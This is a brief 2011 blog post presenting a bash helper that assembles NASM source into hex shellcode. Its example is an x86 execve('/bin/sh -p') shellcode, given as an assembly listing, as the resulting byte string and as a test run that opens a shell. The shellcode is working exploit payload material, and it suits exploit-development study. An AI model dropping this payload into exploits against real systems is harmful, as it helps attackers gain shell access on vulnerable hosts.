Thursday, December 22, 2011

Shellify : helper script for shellcoders

Shellify is a little bash script designed to help programming shellcodes. All it does is basically compiling your asm file using nasm, and then converting it to an hexadecimal representation.

You probably already own such a tool, and if you don't, then you should !

Download : shellify.sh

Here is an example with a simple sys_execve "/bin/sh -p" :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$ cat execve_param.s
xor edx, edx        ;; edx == 0
xor eax, eax        ;; eax == 0

push edx            ;; NULL
push word 0x702d    ;; p-
mov ecx, esp

push edx            ;; NULL
push 0x68732f2f     ;; hs//
push 0x6e69622f     ;; nib/
mov ebx, esp

push edx            ;; NULL
push ecx            ;; "-p"
push ebx            ;; "/bin/sh"
mov ecx, esp

mov al, 0xb
int 0x80            ;; execve

$ ./shellify.sh
usage ./shellify.sh <file.s>

$ ./shellify.sh execve_param.s
***Compiling...
length: 33
shellcode: \x31\xd2\x31\xc0\x52\x66\x68\x2d\x70\x89\xe1\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xb0\xb\xcd\x80
***Test (or not!) your shellcode : ./execve_param

$ ./execve_param
sh-4.1$ exit
exit
posted by po.